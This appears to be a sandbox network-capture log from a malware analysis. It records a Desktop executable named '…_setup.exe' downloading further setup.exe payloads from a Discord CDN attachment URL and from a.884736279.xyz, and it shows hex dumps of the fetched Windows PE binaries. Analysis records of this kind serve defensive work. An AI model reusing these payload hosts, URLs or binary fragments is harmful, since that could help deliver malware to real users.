2024-07-01 22:05:09 UTC	16384	IN	Data Raw: 38 c0 75 db 4c 8b 02 4c 8b 4c 24 78 4d 39 c1 74 46 48 89 5c 24 28 48 89 54 24 38 4c 89 c0 4c 89 cb 48 89 f1 e8 54 f8 fe ff 84 c0 75 1b 0f b6 44 24 1f 48 8b 4c 24 48 48 8b 54 24 38 48 8b 5c 24 28 48 8b 7c 24 68 eb 97 48 8b 4c 24 48 48 8b 5c 24 28 48 8b 7c 24 68 0f b6 57 51 48 0f af da 48 8d 04 19 48 8d 80 88 00 00 00 bb 01 00 00 00 48 83 c4 58 5d c3 48 ff c2 48 83 c7 10 90 48 83 fa 08 73 7b 48 39 4f 08 75 0d 84 06 44 0f b6 0c 32 41 80 f9 01 77 0e 84 06 44 0f b6 0c 32 45 84 c9 75 d3 eb 5a 4c 8b 0f 4c 8b 54 24 78 4d 39 ca 74 2f 45 8b 19 45 39 1a 75 bc 4d 8d 14 0a 4d 8d 52 fc 4d 8d 0c 09 4d 8d 49 fc 45 8b 09 45 39 0a 75 a4 49 83 f8 08 0f 85 48 fe ff ff 49 89 d0 eb 95 0f b6 48 51 48 0f af d1 48 8d 04 32 48 8d 80 88 00 00 00 bb 01 00 00 00 48 83 c4 58 5d c3 49 Data Ascii: 8uLLL$xM9tFH\$(HT$8LLHTuD$HL$HHT$8H\$(H\|$hHL$HH\$(H\|$hWQHHHHX]HHHs{H9OuD2AwD2EuZLLT$xM9t/EE9uMMRMMIEE9uIHIHQHH2HHX]I

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.6	49740	162.159.133.233	443	5720	C:\Users\user\Desktop\1719859269.0326595_setup.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-01 22:05:09 UTC	624	OUT	GET /attachments/1255737669737254954/1257455463088394404/setup.exe?ex=66847828&is=668326a8&hm=9a0a6baa5ff045d491afd87efad3dd033618cc8c5ce04018ccc10ef67b97fd67& HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Cache-Control: no-cache Host: cdn.discordapp.com Connection: Keep-Alive Cookie: __cf_bm=ex.7TgCY468wc5yu3YRkEsGRG9qmHn86dcAYyaJ385w-1719871508-1.0.1.1-5hdHtN2CIlAZ3ndgxjU1QFbaLT0pT5n.uDcbnhaYWTdTD8z4UsNVmuHyiV0JqEgrvJtmikuVD.LZq.kf7BpweA; _cfuvid=tIsBmNXiVts2Ahh4K2Kvba0M8lkel4q.Jz3q1r9HKzs-1719871508397-0.0.1.1-604800000
2024-07-01 22:05:09 UTC	1268	IN	HTTP/1.1 200 OK Date: Mon, 01 Jul 2024 22:05:09 GMT Content-Type: application/x-msdos-program Content-Length: 7636477 Connection: close CF-Ray: 89c9b22748874325-EWR CF-Cache-Status: HIT Accept-Ranges: bytes, bytes Age: 1 Cache-Control: public, max-age=31536000 Content-Disposition: attachment ETag: "3821b6ad2be5c1f137f798889c75b8fc" Expires: Tue, 01 Jul 2025 22:05:09 GMT Last-Modified: Mon, 01 Jul 2024 21:59:04 GMT Vary: Accept-Encoding alt-svc: h3=":443"; ma=86400 x-goog-generation: 1719871144890346 x-goog-hash: crc32c=kSGWsQ== x-goog-hash: md5=OCG2rSvlwfE395iInHW4/A== x-goog-metageneration: 1 x-goog-storage-class: STANDARD x-goog-stored-content-encoding: identity x-goog-stored-content-length: 7636477 x-guploader-uploadid: ACJd0Np29-ywn_bknvzBbWQPWi6je93q8YWIb3oC-pnVrViGhoXdBYZCmchRxadYSuklXT9T4fk X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=CWtuS%2BPScoGWG0yxTiya0GCE%2BeUloH41kI9t%2F3YvniS0YXH2XCkdeQ6Hp1%2BQyRH6vzEYpkQ7z%2F%2FfsV6iE4S4DIXLvoCqZ8PEzYDOwh5g1Lf4U%2BYobbxQgUinkFZitpfwTn6HaQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare
2024-07-01 22:05:09 UTC	101	IN	Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 Data Ascii: MZ@!L!This program cannot be
2024-07-01 22:05:09 UTC	1369	IN	Data Raw: 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 dd e1 1d 57 99 80 73 04 99 80 73 04 99 80 73 04 1a 9c 7d 04 80 80 73 04 af a6 79 04 d9 80 73 04 17 88 2c 04 98 80 73 04 99 80 72 04 21 80 73 04 1a 88 2e 04 90 80 73 04 af a6 78 04 d4 80 73 04 f6 f6 d9 04 9e 80 73 04 f6 f6 ed 04 98 80 73 04 5e 86 75 04 98 80 73 04 52 69 63 68 99 80 73 04 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 f7 53 e5 4c 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 9a 01 00 00 b0 00 00 00 00 00 00 04 4b 01 00 00 10 00 00 00 b0 01 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 80 02 00 00 04 00 00 00 00 00 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 Data Ascii: run in DOS mode.$Wsss}sys,sr!s.sxsss^usRichsPELSLK@
2024-07-01 22:05:09 UTC	1369	IN	Data Raw: 0f 00 00 39 5d ac c6 85 2c ff ff ff 01 0f 84 e0 02 00 00 8d 8d 54 ff ff ff e8 79 0f 00 00 bf 34 b3 41 00 8d 95 54 ff ff ff 8d 4d a8 89 bd 54 ff ff ff e8 65 2b 00 00 84 c0 75 19 38 5d 0b 75 0c ba 20 02 42 00 33 c9 e8 89 fe 00 00 6a 01 5b e9 21 01 00 00 68 14 02 42 00 8d 4d f0 e8 61 0a 00 00 8d 45 f0 8d 95 54 ff ff ff 50 8d 4d c0 e8 42 2e 00 00 ff 75 f0 e8 63 28 00 00 8d 4d f0 c7 04 24 fc 01 42 00 e8 38 0a 00 00 8d 45 f0 8d 95 54 ff ff ff 50 8d 4d d8 e8 19 2e 00 00 ff 75 f0 e8 3a 28 00 00 8d 4d f0 c7 04 24 e8 01 42 00 e8 0f 0a 00 00 8d 45 f0 8d 95 54 ff ff ff 50 8d 8d 20 ff ff ff e8 ed 2d 00 00 ff 75 f0 e8 0e 28 00 00 59 ba e0 01 42 00 8b 8d 20 ff ff ff e8 b0 28 00 00 85 c0 75 06 88 9d 2c ff ff ff 68 cc 01 42 00 8d 4d f0 e8 ca 09 00 00 8d 55 f0 8d 8d 54 ff Data Ascii: 9],Ty4ATMTe+u8]u B3j[!hBMaETPMB.uc(M$B8ETPM.u:(M$BETP -u(YB (u,hBMUT
2024-07-01 22:05:09 UTC	1369	IN	Data Raw: 45 08 e8 7e 23 00 00 ff 75 c0 e8 76 23 00 00 59 e9 2e 02 00 00 39 5d d0 75 56 68 d0 00 42 00 8d 4d cc e8 dd 05 00 00 8d 55 cc 8d 8d 48 ff ff ff e8 cc 02 00 00 8b 08 e8 29 41 00 00 ff b5 48 ff ff ff f6 d8 1a c0 fe c0 88 45 ff e8 35 23 00 00 38 5d ff 59 74 1a 38 5d 0b 0f 85 39 01 00 00 ba a0 00 42 00 33 c9 e8 11 f9 00 00 e9 28 01 00 00 8d 85 3c ff ff ff 8d 4d c0 50 e8 4b 05 00 00 8d 4d c0 e8 6d 45 00 00 68 94 00 42 00 8d 4d f0 e8 d5 04 00 00 8d 45 c0 8d 4d cc 50 8d 45 f0 50 e8 9b 06 00 00 ff 75 f0 e8 d9 22 00 00 ff 75 c0 e8 d1 22 00 00 59 59 68 8c 00 42 00 8d 4d f0 e8 a6 04 00 00 8d 85 3c ff ff ff 8d 4d cc 50 8d 45 f0 50 e8 69 06 00 00 ff 75 f0 e8 a7 22 00 00 39 5d e8 59 74 16 6a 20 8d 4d cc e8 b3 05 00 00 8d 45 e4 8d 4d cc 50 e8 d2 05 00 00 8d 45 cc 8d 95 Data Ascii: E~#uv#Y.9]uVhBMUH)AHE5#8]Yt8]9B3(<MPKMmEhBMEMPEPu"u"YYhBM<MPEPiu"9]Ytj MEMPE
2024-07-01 22:05:09 UTC	1369	IN	Data Raw: 64 89 0d 00 00 00 00 c9 c2 08 00 e9 f5 3c 00 00 55 8b ec 51 53 56 57 8b 7d 08 8b f1 33 db 89 5d fc 89 1e 89 5e 04 89 5e 08 66 39 1f 74 0c 8b c7 ff 45 fc 40 40 66 39 18 75 f6 ff 75 fc 8b ce e8 bc 04 00 00 8b 06 66 8b 0f 8d 57 02 66 89 08 40 40 66 3b cb 74 0c 66 8b 0a 66 89 08 40 40 42 42 eb ef 8b 45 fc 5f 89 46 04 8b c6 5e 5b c9 c2 04 00 56 57 8b 7c 24 0c 8b f1 33 c0 89 06 89 46 04 89 46 08 ff 77 04 e8 75 04 00 00 8b 0f 8b 06 66 8b 11 66 89 10 40 40 41 41 66 85 d2 75 f1 8b 47 04 5f 89 46 04 8b c6 5e c2 04 00 55 8b ec 51 56 8b f1 57 8b 7d 08 8b 06 33 c9 89 4e 04 89 4d fc 66 89 08 66 39 0f 74 0c 8b c7 ff 45 fc 40 40 66 39 08 75 f6 ff 75 fc 8b ce e8 22 04 00 00 8b 06 66 8b 0f 8d 57 02 66 89 08 40 40 66 85 c9 74 0c 66 8b 0a 66 89 08 40 40 42 42 eb ef 8b 45 fc Data Ascii: d<UQSVW}3]^^f9tE@@f9uufWf@@f;tff@@BBE_F^[VW\|$3FFwuff@@AAfuG_F^UQVW}3NMff9tE@@f9uu"fWf@@ftff@@BBE
2024-07-01 22:05:09 UTC	1369	IN	Data Raw: 08 8b 5c 24 10 8b f7 2b 71 04 4e 3b de 7e 30 83 ff 40 7e 09 8b c7 99 2b c2 d1 f8 eb 0f 33 c0 83 ff 08 0f 9e c0 48 83 e0 0c 83 c0 04 8d 14 30 3b d3 7d 04 2b de 8b c3 03 f8 57 e8 68 ff ff ff 5f 5e 5b c2 04 00 b8 38 91 41 00 e8 3c 17 01 00 83 ec 10 53 8b 5d 0c 56 8b 75 10 57 8b f9 8d 14 33 33 c9 8b 47 04 89 4d f0 3b d0 7e 04 8b f0 2b f3 3b d9 75 0f 3b f0 75 0b 8b 4d 08 57 e8 97 fa ff ff eb 5d 89 4d e4 89 4d e8 89 4d ec 6a 03 8d 4d e4 e8 11 ff ff ff 83 65 fc 00 56 8d 4d e4 e8 04 ff ff ff 33 c9 85 f6 7e 17 8d 04 1b 8b 17 8b 5d e4 66 8b 14 10 66 89 14 4b 41 40 40 3b ce 7c ec 8b 45 e4 8b 4d 08 66 83 24 70 00 8d 45 e4 50 89 75 e8 e8 41 fa ff ff ff 75 e4 e8 f4 17 00 00 59 8b 4d f4 8b 45 08 5f 5e 5b 64 89 0d 00 00 00 00 c9 c2 0c 00 55 8b ec 8b 45 08 53 56 57 8b 70 Data Ascii: \$+qN;~0@~+3H0;}+Wh_^[8A<S]VuW33GM;~+;u;uMW]MMMjMeVM3~]ffKA@@;\|EMf$pEPuAuYME_^[dUESVWp
2024-07-01 22:05:09 UTC	1369	IN	Data Raw: 56 8b f1 56 ff 15 a0 b0 41 00 8b 44 24 08 56 89 46 20 8b 44 24 10 89 46 24 8b 44 24 14 89 46 28 8b 44 24 18 89 46 2c ff 15 9c b0 41 00 5e c2 10 00 8b 44 24 04 56 8d b0 a8 00 00 00 8b ce e8 4a 6e 00 00 85 c0 75 16 8b 44 24 0c 85 c0 74 0c ff 70 04 8b ce ff 30 e8 06 00 00 00 33 c0 5e c2 08 00 56 8b f1 56 ff 15 a0 b0 41 00 8b 44 24 08 56 89 46 28 8b 44 24 10 89 46 2c ff 15 9c b0 41 00 5e c2 08 00 b8 9c 91 41 00 e8 a4 11 01 00 83 ec 0c 56 83 c1 10 57 51 8d 4d e8 e8 20 f5 ff ff 8b 75 08 33 ff 89 7d fc 39 7e 08 7e 26 8b 46 0c 8d 4d e8 ff 34 b8 e8 07 f6 ff ff 8b 4d e8 e8 b8 21 00 00 6a 5c 8d 4d e8 e8 ca f5 ff ff 47 3b 7e 08 7c da ff 75 e8 e8 a0 12 00 00 59 5f 8b 4d f4 5e 64 89 0d 00 00 00 00 c9 c2 04 00 b8 1b 92 41 00 e8 3d 11 01 00 81 ec a0 00 00 00 53 56 8b 75 Data Ascii: VVAD$VF D$F$D$F(D$F,A^D$VJnuD$tp03^VVAD$VF(D$F,A^AVWQM u3}9~~&FM4M!j\MG;~\|uY_M^dA=SVu
2024-07-01 22:05:09 UTC	1369	IN	Data Raw: ff ff e8 1a 0e 00 00 ff 75 b8 e8 12 0e 00 00 ff 75 9c e8 0a 0e 00 00 83 c4 0c 89 7d c4 8d 4d c4 c6 45 fc 0d e8 32 16 00 00 8d 4d c4 c6 45 fc 02 e8 fd 15 00 00 8d 4d d8 c6 45 fc 01 e8 78 31 00 00 eb 05 8b 45 10 89 18 ff 75 e8 e8 d1 0d 00 00 83 4d fc ff 59 8d 4d a8 e8 5c 31 00 00 33 c0 8b 4d f4 5f 5e 5b 64 89 0d 00 00 00 00 c9 c2 10 00 e9 44 31 00 00 55 8b ec 6a 10 68 4c b9 41 00 ff 75 0c e8 ce 07 01 00 83 c4 0c 85 c0 74 16 6a 10 68 e8 b2 41 00 ff 75 0c e8 b8 07 01 00 83 c4 0c 85 c0 75 12 8b 4d 10 8b 45 08 50 89 01 8b 08 ff 51 04 33 c0 eb 05 b8 02 40 00 80 5d c2 0c 00 8b 4c 24 04 ff 49 04 8b 41 04 75 0d 85 c9 74 07 8b 01 6a 01 ff 50 18 33 c0 c2 04 00 56 8b f1 e8 14 00 00 00 f6 44 24 08 01 74 07 56 e8 31 0d 00 00 59 8b c6 5e c2 04 00 c7 01 54 b3 41 00 83 c1 Data Ascii: uu}ME2MEMEx1EuMYM\13M_^[dD1UjhLAutjhAuuMEPQ3@]L$IAutjP3VD$tV1Y^TA
2024-07-01 22:05:09 UTC	1369	IN	Data Raw: e4 c6 45 fc 02 e8 2d 2b 00 00 8b 4d e4 e8 f7 17 00 00 84 c0 75 40 8d 45 e4 8d 4d d8 50 6a 09 5a e8 70 63 00 00 50 8d 4e 64 c6 45 fc 03 e8 74 eb ff ff ff 75 d8 e8 8e 08 00 00 ff 75 e4 c7 46 60 05 40 00 80 e8 7f 08 00 00 ff 75 c0 e8 77 08 00 00 83 c4 0c eb 6f 68 9c 03 42 00 8d 4d d8 e8 49 ea ff ff 8b 47 08 8b 4f 0c 53 c6 45 fc 04 8b 44 81 fc 8d 4d b0 51 8d 4d d8 8b 00 51 8d 4d e4 51 8b 4e 1c 50 e8 28 f4 ff ff ff 75 d8 c6 45 fc 02 e8 33 08 00 00 8b 47 08 8b 57 0c 59 8b 44 82 fc 8b 4e 20 51 53 8b 00 6a ff 53 50 8b 10 ff 52 1c ff 75 e4 89 46 60 e8 0d 08 00 00 ff 75 c0 e8 05 08 00 00 59 59 8b 4d f4 5f 5e 5b 64 89 0d 00 00 00 00 c9 c3 8b c1 33 c9 89 48 04 89 48 08 89 48 0c 8b 4c 24 04 89 48 10 c7 00 80 b3 41 00 c2 04 00 56 8b f1 e8 e0 0f 00 00 f6 44 24 08 01 74 Data Ascii: E-+Mu@EMPjZpcPNdEtuuF`@uwohBMIGOSEDMQMQMQNP(uE3GWYDN QSjSPRuF`uYYM_^[d3HHHL$HAVD$t
2024-07-01 22:05:09 UTC	1369	IN	Data Raw: 00 56 8b f1 e8 14 00 00 00 f6 44 24 08 01 74 07 56 e8 59 03 00 00 59 8b c6 5e c2 04 00 b8 4b 94 41 00 e8 00 02 01 00 51 56 8b f1 89 75 f0 c7 06 9c b3 41 00 c7 46 04 90 b3 41 00 8d 4e 6c c7 45 fc 07 00 00 00 e8 67 00 00 00 ff b6 e4 00 00 00 e8 1a 03 00 00 59 8d 4e 68 e8 45 ff ff ff ff 76 50 e8 09 03 00 00 8b 46 4c 59 85 c0 c6 45 fc 03 74 06 8b 08 50 ff 51 08 ff 76 28 e8 ef 02 00 00 ff 76 1c e8 e7 02 00 00 ff 76 10 e8 df 02 00 00 8b 76 0c 83 4d fc ff 83 c4 0c 85 f6 74 06 8b 06 56 ff 50 08 8b 4d f4 5e 64 89 0d 00 00 00 00 c9 c3 56 8b f1 8b 06 85 c0 75 04 b0 01 5e c3 50 ff 15 d4 b1 41 00 85 c0 0f 95 c0 84 c0 74 03 83 26 00 5e c3 8b 01 85 c0 74 06 8b 08 50 ff 51 08 c3 b8 60 94 41 00 e8 3d 01 01 00 51 56 8b f1 89 75 f0 c7 06 88 b3 41 00 83 65 fc 00 e8 a9 0a 00 Data Ascii: VD$tVYY^KAQVuAFANlEgYNhEvPFLYEtPQv(vvvMtVPM^dVu^PAt&^tPQ`A=QVuAe

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.6	49742	79.174.95.43	443	5720	C:\Users\user\Desktop\1719859269.0326595_setup.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-01 22:05:10 UTC	231	OUT	GET /385137/setup.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Cache-Control: no-cache Host: a.884736279.xyz Connection: Keep-Alive
2024-07-01 22:05:10 UTC	248	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 01 Jul 2024 22:05:10 GMT Content-Type: application/octet-stream Content-Length: 7619942 Last-Modified: Mon, 01 Jul 2024 22:00:50 GMT Connection: close ETag: "66832712-744566" Accept-Ranges: bytes
2024-07-01 22:05:10 UTC	16136	IN	Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 dd e1 1d 57 99 80 73 04 99 80 73 04 99 80 73 04 1a 9c 7d 04 80 80 73 04 af a6 79 04 d9 80 73 04 17 88 2c 04 98 80 73 04 99 80 72 04 21 80 73 04 1a 88 2e 04 90 80 73 04 af a6 78 04 d4 80 73 04 f6 f6 d9 04 9e 80 73 04 f6 f6 ed 04 98 80 73 04 5e 86 75 04 98 80 73 04 52 69 63 68 99 80 73 04 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 f7 53 e5 4c 00 00 00 00 00 00 00 00 e0 00 0f Data Ascii: MZ@!L!This program cannot be run in DOS mode.$Wsss}sys,sr!s.sxsss^usRichsPELSL
2024-07-01 22:05:10 UTC	16384	IN	Data Raw: 0c 8b 45 b8 c1 e8 04 a8 01 75 22 32 db ff 75 c0 e8 7f ef ff ff ff 75 dc e8 77 ef ff ff ff 75 e8 e8 6f ef ff ff 83 c4 0c e9 92 00 00 00 ff 75 c0 c6 45 fc 01 e8 5b ef ff ff 59 8d 45 dc 8d 4d e8 50 e8 2c d2 ff ff 3b 75 ec 0f 8d 81 00 00 00 8b 55 e8 8d 44 72 02 66 8b 08 66 3b cf 74 09 66 85 c9 74 0c 40 40 eb ef 2b c2 d1 f8 8b f0 eb 03 83 ce ff 85 f6 7d 03 8b 75 ec 8d 45 d0 56 50 8d 4d e8 e8 ac d2 ff ff 8b 08 c6 45 fc 04 e8 03 fe ff ff 8a d8 c6 45 fc 01 ff 75 d0 f6 db 1a db fe c3 e8 ef ee ff ff 84 db 59 74 9c 32 db ff 75 dc e8 e0 ee ff ff 8b 55 e8 59 52 e8 d6 ee ff ff 59 8b 4d f4 5f 8a c3 5e 5b 64 89 0d 00 00 00 00 c9 c3 b3 01 eb d8 56 8b f1 33 d2 e8 b6 fc ff ff 84 c0 75 02 5e c3 56 ff 15 f8 b0 41 00 85 c0 0f 95 c0 5e c3 55 8b ec 83 ec 0c 80 3d 48 31 42 00 00 Data Ascii: Eu"2uuwuouE[YEMP,;uUDrff;tft@@+}uEVPMEEuYt2uUYRYM_^[dV3u^VA^U=H1B
2024-07-01 22:05:10 UTC	16384	IN	Data Raw: ff ff 89 7d fc e8 b0 ad ff ff e9 56 ff ff ff 8b 45 e0 66 89 5d c8 66 89 5d ca 8b 40 0c 8b 74 88 fc 8b 06 8d 7d c8 57 52 8b 08 50 89 55 fc ff 51 20 3b c3 0f 85 ba 01 00 00 66 83 7d c8 13 0f 85 29 03 00 00 8b 06 8b 7d d0 8d 55 c4 8b 08 52 50 ff 51 14 3b c3 0f 85 98 01 00 00 3b 7d c4 0f 83 09 03 00 00 83 4d fc ff 8d 4d c8 e8 bc d2 ff ff 89 5d f0 8b 06 8d 55 f0 52 68 28 b2 41 00 8b 08 50 c7 45 fc 02 00 00 00 ff 11 85 c0 8b 45 f0 0f 85 cf 02 00 00 3b c3 0f 84 c7 02 00 00 89 5d ec 8b 08 8d 55 ec 52 57 50 c6 45 fc 03 ff 51 0c 85 c0 8b 45 ec 0f 85 a1 02 00 00 3b c3 0f 84 99 02 00 00 89 5d e8 8b 08 8d 55 e8 52 68 f8 b2 41 00 50 c6 45 fc 04 ff 11 3b c3 8b 45 e8 0f 85 70 02 00 00 3b c3 0f 84 68 02 00 00 8d 4d 88 e8 a6 02 00 00 8d 45 8c 8b ce 50 57 c6 45 fc 05 e8 63 Data Ascii: }VEf]f]@t}WRPUQ ;f})}URPQ;;}MM]URh(APEE;]URWPEQE;]URhAPE;Ep;hMEPWEc
2024-07-01 22:05:10 UTC	16384	IN	Data Raw: b2 41 00 ff 75 0c e8 bd 69 00 00 83 c4 0c 85 c0 75 12 8b 4d 10 8b 45 08 50 89 01 8b 08 ff 51 04 33 c0 eb 05 b8 02 40 00 80 5d c2 0c 00 56 8b 74 24 08 ff 4e 04 8b 46 04 75 14 85 f6 74 0e 8b ce e8 0d 00 00 00 56 e8 49 6f ff ff 59 33 c0 5e c2 04 00 b8 5f a3 41 00 e8 f0 6d 00 00 51 56 8b f1 89 75 f0 83 65 fc 00 8d 4e 10 e8 1e 00 00 00 8b 76 08 83 4d fc ff 85 f6 74 06 8b 06 56 ff 50 08 8b 4d f4 5e 64 89 0d 00 00 00 00 c9 c3 b8 ac a3 41 00 e8 b5 6d 00 00 51 56 8b f1 89 75 f0 8d 8e ac 01 00 00 c7 45 fc 04 00 00 00 e8 f5 76 ff ff 8d 8e 98 01 00 00 c6 45 fc 03 e8 e6 76 ff ff 8d 8e 84 01 00 00 c6 45 fc 02 e8 d7 76 ff ff 8d 8e 70 01 00 00 c6 45 fc 01 e8 c8 76 ff ff 80 65 fc 00 8d 8e 58 01 00 00 e8 b9 76 ff ff 83 4d fc ff 8b ce e8 0d 00 00 00 8b 4d f4 5e 64 89 0d 00 Data Ascii: AuiuMEPQ3@]Vt$NFutVIoY3^_AmQVueNvMtVPM^dAmQVuEvEvEvpEveXvMM^d
2024-07-01 22:05:10 UTC	16384	IN	Data Raw: c7 40 04 24 b5 41 00 c7 40 08 60 b8 41 00 89 48 0c 89 48 10 89 88 a0 00 00 00 89 48 14 88 88 90 00 00 00 88 88 91 00 00 00 c7 80 b4 00 00 00 00 00 10 00 c7 80 b8 00 00 00 00 00 40 00 88 88 c0 00 00 00 c7 00 24 b9 41 00 c7 40 04 14 b9 41 00 c7 40 08 00 b9 41 00 89 88 a4 00 00 00 89 48 1c 89 48 18 89 48 34 89 48 30 c3 55 8b ec 56 8b 75 0c 6a 10 68 4c b9 41 00 56 e8 4a 29 00 00 83 c4 0c 85 c0 75 0a 8b 4d 10 8b 45 08 89 01 eb 59 6a 10 68 a8 b2 41 00 56 e8 2c 29 00 00 83 c4 0c 85 c0 74 e2 6a 10 68 98 b2 41 00 56 e8 18 29 00 00 83 c4 0c 85 c0 75 0a 8b 45 08 8b c8 8d 50 04 eb 1c 6a 10 68 48 b2 41 00 56 e8 fa 28 00 00 83 c4 0c 85 c0 75 1d 8b 45 08 8b c8 8d 50 08 f7 d9 1b c9 23 ca 8b 55 10 89 0a 8b 08 50 ff 51 04 33 c0 eb 05 b8 02 40 00 80 5e 5d c2 0c 00 8b 44 24 Data Ascii: @$A@`AHHH@$A@A@AHHH4H0UVujhLAVJ)uMEYjhAV,)tjhAV)uEPjhHAV(uEP#UPQ3@^]D$
2024-07-01 22:05:10 UTC	16384	IN	Data Raw: ff 68 e0 b9 41 00 68 2c 4a 41 00 64 a1 00 00 00 00 50 64 89 25 00 00 00 00 83 ec 58 53 56 57 89 65 e8 ff 15 74 b0 41 00 33 d2 8a d4 89 15 d0 33 42 00 8b c8 81 e1 ff 00 00 00 89 0d cc 33 42 00 c1 e1 08 03 ca 89 0d c8 33 42 00 c1 e8 10 a3 c4 33 42 00 6a 01 e8 96 0e 00 00 59 85 c0 75 08 6a 1c e8 c3 00 00 00 59 e8 48 09 00 00 85 c0 75 08 6a 10 e8 b2 00 00 00 59 33 f6 89 75 fc e8 b7 2a 00 00 ff 15 78 b0 41 00 a3 3c 5a 42 00 e8 75 29 00 00 a3 40 33 42 00 e8 1e 27 00 00 e8 60 26 00 00 e8 bb 20 00 00 89 75 d0 8d 45 a4 50 ff 15 7c b0 41 00 e8 f1 25 00 00 89 45 9c f6 45 d0 01 74 06 0f b7 45 d4 eb 03 6a 0a 58 50 ff 75 9c 56 56 ff 15 80 b0 41 00 50 e8 30 c4 fe ff 89 45 a0 50 e8 a9 20 00 00 8b 45 ec 8b 08 8b 09 89 4d 98 50 51 e8 3b 24 00 00 59 59 c3 8b 65 e8 ff 75 98 Data Ascii: hAh,JAdPd%XSVWetA33B3B3B3BjYujYHujY3u*xA<ZBu)@3B'`& uEP\|A%EEtEjXPuVVAP0EP EMPQ;$YYeu
2024-07-01 22:05:10 UTC	16384	IN	Data Raw: 85 94 00 00 00 39 5d 18 75 08 a1 4c 35 42 00 89 45 18 53 53 ff 75 10 ff 75 0c 8b 45 20 f7 d8 1b c0 83 e0 08 40 50 ff 75 18 ff 15 a8 b0 41 00 89 45 e0 3b c3 74 63 89 5d fc 8d 3c 00 8b c7 83 c0 03 24 fc e8 70 b1 ff ff 89 65 e8 8b f4 89 75 dc 57 53 56 e8 40 f2 ff ff 83 c4 0c eb 0b 6a 01 58 c3 8b 65 e8 33 db 33 f6 83 4d fc ff 3b f3 74 29 ff 75 e0 56 ff 75 10 ff 75 0c 6a 01 ff 75 18 ff 15 a8 b0 41 00 3b c3 74 10 ff 75 14 50 56 ff 75 08 ff 15 00 b0 41 00 eb 02 33 c0 8d 65 cc 8b 4d f0 64 89 0d 00 00 00 00 5f 5e 5b c9 c3 cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 56 33 c0 50 50 50 50 50 50 50 50 8b 55 0c 8d 49 00 8a 02 0a c0 74 07 42 0f ab 04 24 eb f3 8b 75 08 83 c9 ff 90 41 8a 06 0a c0 74 07 46 0f a3 04 24 73 f2 8b c1 83 c4 20 5e c9 c3 cc cc 55 8b ec 56 33 c0 50 Data Ascii: 9]uL5BESSuuE @PuAE;tc]<$peuWSV@jXe33M;t)uVuujuA;tuPVuA3eMd_^[UV3PPPPPPPPUItB$uAtF$s ^UV3P
2024-07-01 22:05:10 UTC	16384	IN	Data Raw: 01 00 00 00 a4 99 41 00 01 00 00 00 ac 99 41 00 01 00 00 00 b4 99 41 00 00 00 00 00 bc 99 41 00 ff ff ff ff c4 99 41 00 20 05 93 19 01 00 00 00 50 d1 41 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff ff ff d8 99 41 00 20 05 93 19 01 00 00 00 78 d1 41 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff ff ff ec 99 41 00 20 05 93 19 02 00 00 00 a0 d1 41 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff ff ff 00 9a 41 00 00 00 00 00 0a 9a 41 00 20 05 93 19 01 00 00 00 d0 d1 41 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff ff ff 1c 9a 41 00 20 05 93 19 01 00 00 00 f8 d1 41 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff ff ff 30 9a 41 00 20 05 93 19 01 00 00 Data Ascii: AAAAA PAA xAA AAA AA A0A
